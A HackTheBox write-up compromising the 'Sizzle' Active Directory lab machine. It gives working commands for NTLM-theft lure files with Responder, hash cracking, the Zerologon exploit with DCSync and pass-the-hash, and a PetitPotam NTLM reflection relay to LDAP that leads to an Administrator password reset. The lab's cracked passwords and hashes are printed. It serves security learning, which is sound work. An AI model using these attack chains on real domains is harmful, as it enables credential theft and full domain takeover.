Sizzle HackTheBox

Sizzle is an Insane-rated machine from HackTheBox, and this writeup takes it down through two unintended paths. We start with a guest-readable share, Department Shares, which contains a world-writable folder. Dropping NTLM-theft lure files (a phishing attack against anyone who browses the folder) into it makes a domain user authenticate to our Responder listener, and the captured NetNTLMv2 hash cracks to her password. With a valid domain account in hand, the first path is Zerologon (CVE-2020-1472) followed by a DCSync. The second is an NTLM reflection attack: a PetitPotam coercion relayed straight back to the DC's own LDAP service gives us a SYSTEM LDAP shell, from which we grant our user full control (a DACL write) over the Administrator account, reset its password and take over the domain.


Initial Foothold

Rustscan

```bash
rustscan -a 10.129.201.193 -r 1-65535 -- -sC -sV -vv
```

The scan identifies the box as a Windows Server 2016 domain controller running Active Directory.

The domain name is htb.local and the hostname is SIZZLE, so the FQDN is sizzle.htb.local. Add both the short name and the FQDN to /etc/hosts now; several of the tools used later (secretsdump against SIZZLE.HTB.LOCAL, for one) need the name to resolve.

SMB Enumeration

Let's list the shares using guest (null) authentication.

```bash
nxc smb 10.129.201.193 -u '.' -p '' --shares
```


We have read access to one of the shares, Department Shares; let's connect to it with smbclient.

```bash
smbclient //10.129.201.193/'Department Shares' -U '.'%''
```


Let's download everything in the share (toggle recurse on and prompt off in smbclient and mget the lot, or let nxc's spider_plus module do the walk).


The share has a folder per user, which already gives us a list of likely domain usernames.

After some enumeration I found that I have write access to the Users/Public folder.

NTLM Theft

Since we have write access, let's try NTLM theft. The idea is to drop files whose icon or resource fields point at a UNC path on our machine; when a user browses the folder in Explorer, Windows tries to fetch the icon over SMB and authenticates with NTLM to do so, handing us a NetNTLMv2 response.

I will generate every lure variant that ntlm_theft knows about.

```bash
python3 /opt/ntlm_theft/ntlm_theft.py -g all -s 10.10.14.20 -f malicious
```


Now I'll start Responder as the listener on the VPN interface.

```bash
python3 /opt/Responder/Responder.py -I tun0
```


Now connect to the share again and upload all the generated files into the Users/Public folder.

```bash
smbclient //10.129.201.193/'Department Shares' -U '.'%''
```


After a while we get a hit in the Responder window: a NetNTLMv2 response for the user amanda.


Let's crack it with hashcat (mode 5600 is NetNTLMv2).

```bash
hashcat -m 5600 amandahash.txt /usr/share/wordlists/rockyou.txt
```


It cracks: amanda's password is Ashare1972.

Bloodhound

Let's collect BloodHound data with RustHound, including the ADCS objects.

```bash
rusthound -u amanda -p 'Ashare1972' -d htb.local -i 10.129.201.193 --adcs -z
```


Mark amanda as owned in BloodHound and check her outbound object control.


But Kerberos (port 88) is filtered on the DC, so anything that needs a KDC exchange from our position, such as Shadow Credentials (PKINIT) or targeted Kerberoasting (TGS requests), is off the table.

I will add the intended paths soon; for privilege escalation, see below.

Privilege Escalation

ZEROLOGON (CVE-2020-1472) (unintended)

This Windows Server 2016 DC turns out to be unpatched against CVE-2020-1472, Zerologon. Don't infer that from the OS version alone: confirm it first with nxc's zerologon module or the tester script that accompanies the exploit, because the exploit itself is destructive (it overwrites the DC machine account password).

```bash
python3 cve-2020-1472-exploit.py 'SIZZLE$' 10.129.201.193
```


A successful run resets the DC machine account (SIZZLE$) password to an empty string, whose NT hash is the well-known 31D6CFE0D16AE931B73C59D7E0C089C0. Authenticating as SIZZLE$ with that hash lets us DCSync the whole domain with secretsdump (SIZZLE.HTB.LOCAL must resolve, hence the /etc/hosts entry). Caveat: the empty machine password breaks the DC's secure channel with the rest of the domain, so outside a lab you must recover the original password (the $MACHINE.ACC plain_password_hex value secretsdump prints once you dump LSA secrets with an admin hash) and put it back with the restorepassword script from the exploit repository before leaving.

```bash
secretsdump.py htb.local/'SIZZLE$'@SIZZLE.HTB.LOCAL -hashes ':31D6CFE0D16AE931B73C59D7E0C089C0'
```


With the Administrator NT hash from the dump we can pass the hash with psexec and get a SYSTEM shell on the box.

```bash
psexec.py -hashes :f6b7160bfc91823792e0ac3a162c9267 htb.local/Administrator@10.129.201.193
```


Rooted!

The user flag is on mrlky's desktop.


NTLM Reflection PetitPotam (unintended)

The other unintended path is an NTLM reflection attack: coerce the DC into authenticating to us and relay that authentication straight back to the DC's own LDAP service. Reflection normally fails because Windows detects a machine authenticating to itself; the DNS record added below carries the crafted name suffix from the CVE-2025-33073 research that defeats that check. All it needs is a valid domain account, which amanda gives us.

Two settings on the DC decide where the relay can go. SMB signing is required (it always is on a domain controller), so relaying to SMB is dead; LDAP signing is not enforced, so relaying to LDAP works. Because the coerced authentication arrives over SMB and is relayed to LDAP, the NTLM MIC also has to be stripped (ntlmrelayx's --remove-mic, the CVE-2019-1040 "drop the MIC" bypass), which only succeeds because this DC is unpatched for it. nxc shows the SMB signing state on its banner line and its ldap-checker module reports LDAP signing and channel binding.

SMB Signing - TRUE

LDAP Signing - FALSE

Add a DNS record for the crafted name, pointing at our attacker IP. By default any authenticated domain user may create records in the AD-integrated zone, so amanda's credentials are enough; dnstool from krbrelayx does it over LDAP.

```bash
python3 /opt/krbrelayx/dnstool.py -u 'htb.local\amanda' -p 'Ashare1972' -d 10.10.14.20 -a add -r localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -dns-ip 10.129.201.193 10.129.201.193 --allow-multiple
```


Start ntlmrelayx with the DC's LDAP service as the target and the interactive shell (-i) enabled.

```bash
ntlmrelayx.py -smb2support -t ldap://10.129.201.193 -i -domain htb.local --remove-mic
```


Coercion using PetitPotam

```bash
nxc smb 10.129.201.193 -u 'amanda' -p 'Ashare1972' -M coerce_plus -o METHOD=Petitpotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
```


After the coercion the DC resolves the crafted name to our host and authenticates to the relay, which forwards the authentication to LDAP and, thanks to -i, opens an interactive LDAP shell on localhost port 11000.


Connect to the shell with nc.

```bash
nc 127.0.0.1 11000
```


In the LDAP shell we use grant_control (it takes the target object and then the grantee) to give amanda full control over the Administrator account; this is a DACL write on the Administrator object, performed with the privileges of the relayed session.


Let's use bloodyAD, authenticated as amanda, to reset the Administrator password (the domain is htb.local, not the value copied from another box).

```bash
bloodyad -d htb.local -u 'amanda' -p 'Ashare1972' -i '10.129.201.193' set password Administrator 'aashwin10!'
```


Now let's log in with psexec.py using the new password.

```bash
psexec.py htb.local/Administrator:'aashwin10!'@10.129.201.193
```


Rooted!


Thanks for reading 😄

This post is licensed under CC BY 4.0 by the author.